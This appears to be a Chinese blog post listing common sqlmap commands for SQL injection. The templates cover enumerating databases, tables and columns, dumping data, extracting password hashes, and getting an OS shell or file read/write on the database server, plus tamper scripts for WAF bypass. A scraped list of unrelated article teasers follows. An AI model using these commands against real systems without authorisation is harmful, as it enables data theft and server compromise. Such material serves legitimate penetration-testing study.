一、sqlmap常用基础命令

sqlmap Common operation command

以下命令顺序即为sql注入常见步骤。

sqlmap -u [“url”] --dbs #获取数据库
sqlmap -u [“url”] --current-user #获取当前用户名称 :
sqlmap -u [“url”] --current-db #获取当前数据库名称
sqlmap -u [“url”] -D [‘数据库名’] --tables   #列出表名 :
sqlmap -u [“url”] -D [‘数据库名’] -T[‘表名’] --columns #列出字段
sqlmap -u [“url”] -D [‘数据库名’] -T [‘表名’] -C [‘字段名1,字段名2,…’] --dump #获取字段内容

如果是Microsoft Access 可省略前三个步骤 且不需要-D参数

--------------------

cookie 注入 可添加 --cookie=["cookie内容"]

  • --cookie=["cookie的内容"]        设置cookie 值 通常配合获取数据库使用
--data        设置 POST 提交的值
-u        指定目标 URL
-b        获取 DBMS banner
--current-db        获取当前数据库
--current-user        获取当前数据库的用户
--tables        获取数据库里所有的表名
--columns        获取表里的所有字段
--dump        获取字段中的内容
--current-user        获取当前用户
-D [数据库名]       指定数据库名
-T  [表名]      指定表名
-C  [字段名]      指定字段名
--string       当查询可用时用来匹配页面中的字符串
--users        枚举所有用户
--passwords      枚举所有用户的密码hsah
--dbs      枚举数据库中的数据库名

GET型注入一般用 sqlmap -u "url"

POST型注入一般用 sqlmap -u "url" --data "POST参数"

如果需要增加cookie或其他请求头 可将请求保存到文本中假如为request.txt,则用sqlmap -r request.txt

二、sqlmap常用基础命令

--level 5  探测等级(1~5 默认为1,等级越高Payload越多,速度也比较慢)--is-dba   判断当前用户是否是管理员权限--roles    列出数据库管理员角色(仅适用与Oracle数据库)--referer  HTTP Referer头(伪造HTTP头中的Referer,当--level等级大于等于3时会通过伪造Referer来进行注入)--sql-shell 运行自定义SQL语句 用法:sqlmap -u url --sql-shell--os-cmd,--os-shell 运行任意操作系统命令(仅支持MySQL、PostgreSQL、SQL Server)--file-read 从数据库服务器中读取文件(要知道文件绝对路径)--file-write "本地文件路径" --file-dest "远程绝对路径"   上传文件到数据库服务器中--tamper "模块名" bypass绕waf时使用 具体模块可参考书《Web安全攻防 渗透测试实战指南》P40~49页

转载于:https://www.cnblogs.com/iAmSoScArEd/articles/9263735.html

sqlmap常用操作命令相关推荐

  1. 安装虚拟机及Linux常用操作命令

    一.实验环境 Windows10 ,VMware Workstation 12.1.1 ,Ubuntu kylin 16.04 二.实验内容与完成情况 1.新建用户Hadoop (1)安装时新建 (2 ...

  2. VMware Workstation下新建用户及Linux常用操作命令

    一.实验环境 Windows10 ,VMware Workstation 12.1.1 ,Ubuntu kylin 16.04 二.实验内容与完成情况 1.新建用户Hadoop (1)安装时新建 (2 ...

  3. Git常用操作命令----有备无患

    Git常用操作命令: 1)远程仓库相关命令 检出仓库:$ git clone git://github.com/jquery/jquery.git 查看远程仓库:$ git remote -v 添加远 ...

  4. git常用操作命令整理大全(含github操作)

    git常用操作命令整理大全

  5. Redis 常用操作命令

    Redis 常用操作命令 key 1 DEL key该命令用于在 key 存在时删除 key.2 DUMP key 序列化给定 key ,并返回被序列化的值.3 EXISTS key 检查给定 key ...

  6. LINUX中常用操作命令

    LINUX中常用操作命令 Linux简介及Ubuntu安装 常见指令 系统管理命令 打包压缩相关命令 关机/重启机器 Linux管道 Linux软件包管理 vim使用 用户及用户组管理 文件权限管理 ...

  7. svn 常用操作命令

    svn 常用操作命令 检出 svn checkout http://路径(目录或文件的全路径) [本地目录全路径] --username 用户名 svn checkout svn://路径(目录或文件 ...

  8. Redis 常用操作命令,非常详细

    转载自  Redis 常用操作命令,非常详细 下面总结并演示了 Redis 的 常用管理命令.key 操作.字符串.集合.列表.散列类型的操作命令. 你需要掌握的 Redis 知识 史上最全 Redi ...

  9. linux基本命令du,Linux常用操作命令汇总

    你还在为不知道Linux常用操作命令汇总而不知所措么?下面来是学习啦小编为大家收集的Linux常用操作命令汇总,欢迎大家阅读: Linux常用操作命令汇总 1.ls 命令 ls以默认方式显示当前目录文 ...

最新文章

  1. 阿里如何实现100%容器化镜像化?八年技术演进之路回顾 1
  2. 2019年招聘过程的种种酸甜苦辣历程
  3. python求出五位数的回文数_python之递归
  4. 20135202闫佳歆--week 8 实验:理解进程调度时机跟踪分析进程调度与进程切换的过程--实验及总结...
  5. NSDate分类,把系统返回的时间与现在进行比较---秀清
  6. 值类型与引用类型传递的艺术
  7. POJ 3471 Integral Roots(素数、因数)
  8. LeetCode讲解视频博主链接
  9. 计算机基础知识总结(一)
  10. Activate Scrolling with Middle Trackpad Button
  11. 面试题之心理测试题及答案
  12. PBR流程介绍和模型规范
  13. 自己写Shader-翻书效果
  14. 思科vPC (Virtual Por Channel)
  15. 红队培训班作业 | 五种免杀bypass火绒360姿势横向测评:哪款更适合你?
  16. visual studio 2022 更改主题以及调试
  17. python实现rar解压和压缩
  18. 【Windows脚本】打印机脚本1-添加打印机(无需物理打印机)
  19. linux源代码哪里下载,Redhat的源代码在哪里下载
  20. 开源视频剪辑—脑图软件

热门文章

  1. Postman响应断言
  2. oracle忘记实例名,Oracle的安装和MS SQL Server实例名
  3. python绘图函数m_python绘图数据m
  4. 【CV夏季划】2021年冲刺CV秋招,100余课时从理论基础到进阶实践系统掌握
  5. 【NLP】有三AI NLP知识星球来了,仅此一家别无分店
  6. 全球及中国七氟二甲基辛二酸铜(II)行业竞争策略与投资前景研究报告2022版
  7. 全球及中国语音拾音耳机行主要产品及营销模式分析报告业2022-2028年版
  8. CEF:给客户端内嵌一个Chrome吧
  9. 大湾区菜篮子基地 谋定·农业大健康-林裕豪:从玉农业再次入选
  10. Linux 虚拟机安装后的配置和一些命令符笔记